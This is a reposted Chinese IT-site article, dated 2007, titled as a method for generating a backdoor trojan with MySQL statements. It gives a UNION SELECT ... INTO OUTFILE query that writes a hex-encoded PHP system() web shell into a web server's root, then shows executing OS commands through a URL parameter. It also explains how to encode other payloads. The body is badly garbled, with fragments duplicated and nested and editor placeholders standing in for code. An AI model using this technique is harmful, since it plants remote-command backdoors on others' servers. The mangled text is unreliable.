我的一亩三分地 我就喜欢!
13fen  设为主页
 收藏本站
 
当前位置: > 一亩三分地:首页 > 综合文库 > 数据库 > MySql > 运用Mysql语句生成后门木马的具体方法
热门文章排行
热门文章排行 MySQL服务器的启动与停止(12-15)
如何将Access和Excel导入到Mysql中之(11-16)
如何将Access和Excel导入到Mysql中之(11-16)
DBI/mysql FAQ(11-21)
redhat8 mysql安装具体过程(12-15)
精采文章排行
精采文章排行 用于 SELECT 和 WHERE 子句的函数(11-16)
数据操纵:SELECT, INSERT, UPDATE, (11-16)
数据定义:CREATE、DROP、ALTER(11-16)
基本的 MySQL 用户实用命令(11-16)
MySQL数据的导出和导入工具:mysqldum(11-16)
技术专题推荐
网管论坛交流
 

运用Mysql语句生成后门木马的具体方法 

作者:   来源:   点击:   日期:2007-11-21

通过Mysql 的语句生成后门木马的方法:

 

SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
 
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

 

 

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

 

2 3 <?php system(
通过Mysql 的语句生成后门木马的方法: 


 





    
        

            
            
SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
 
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

            		
        

    





 


 


通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着: 


 





    
        

            
            
___FCKpd___1

            		
        

    





 


 


再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令! 


 


问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么? 


 


答:就是下图代码中的十六进制编码, 


 





    
        

            
            
<?php system(
通过Mysql 的语句生成后门木马的方法: 


 





    
        

            
            
SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
 
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

            		
        

    





 


 


通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着: 


 





    
        

            
            
2 3 <?php system(
通过Mysql 的语句生成后门木马的方法: 


 





    
        

            
            
SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
 
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

            		
        

    





 


 


通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着: 


 





    
        

            
            
___FCKpd___1

            		
        

    





 


 


再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令! 


 


问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么? 


 


答:就是下图代码中的十六进制编码, 


 





    
        

            
            
___FCKpd___2

            		
        

    





 


如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了! 

REQUEST[cmd]);?>

            		
        

    





 


 


再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令! 


 


问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么? 


 


答:就是下图代码中的十六进制编码, 


 





    
        

            
            
___FCKpd___2

            		
        

    





 


如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了! 

REQUEST[cmd]);?>

            		
        

    





 


如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了! 

REQUEST[cmd]);?>

 

 

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

 

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

 

答:就是下图代码中的十六进制编码,

 

___FCKpd___2

 

如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!



文章评论】 【收藏本文】 【推荐好友】 【打印本文】 【论坛讨论

   相关文章:
·精细讲解最简便的备份MySQL数据库的方法 ·让你的MySQL数据库支持中文
·用MySQL创建数据库和数据库表 ·如何在SQL Server中使用CLR调用.NET方法
·mysql中的CREATE和REVOKE语句 ·MySQL常见问题

   文章评论:(条)
  
 请留名: 匿名评论   点击查看所有评论 网管论坛
 

  责任编辑:一分  声明:刊登此文章是为了传递更多信息,文章内容仅供参考,转载请注明出处。